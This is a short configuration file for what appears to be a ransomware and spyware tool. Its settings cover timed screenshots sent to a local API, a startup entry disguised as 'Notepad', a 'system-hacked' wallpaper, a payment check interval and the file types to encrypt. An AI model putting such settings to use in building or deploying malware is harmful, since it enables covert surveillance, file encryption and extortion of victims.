DELAY_BETWEEN_SCREENSHOTS=20
DATETIME_FORMAT_OF_SCREENSHOT_IMAGE=%m_%d_%Y_%H_%M_%S
SCREENSHOT_FORMAT=png
STARTUP_BAT_FILE_NAME=Notepad
BACKGROUND_IMAGE_NAME=do_not_delete.jpg
BACKGROUND_IMAGE_URL=https://1c7fab3im83f5gqiow2qqs2k-wpengine.netdna-ssl.com/wp-content/uploads/2021/03/system-hacked.jpg
WEB_SERVER_URL_SCREENSHOT_POST=http://127.0.0.1:8000/api/screenshots/
API_ADMIN_USERNAME=admin
API_ADMIN_PASSWORD=
WEB_SERVER_URL_COMPUTER_POST=http://127.0.0.1:8000/api/computers/
CONFIG_FILE_NAME=config
ENABLE_SCREENSHOT=True
WEB_SERVER_URL_EXPLOIT_POST=http://127.0.0.1:8000/api/exploits/*
WEB_SERVER_URL_COMPUTER_DETAIL_GET=http://127.0.0.1:8000/api/computers/
DELAY_BETWEEN_HAS_PAID_CHECK=10
FILES_TYPES_TO_ENCRYPT=txt,pdf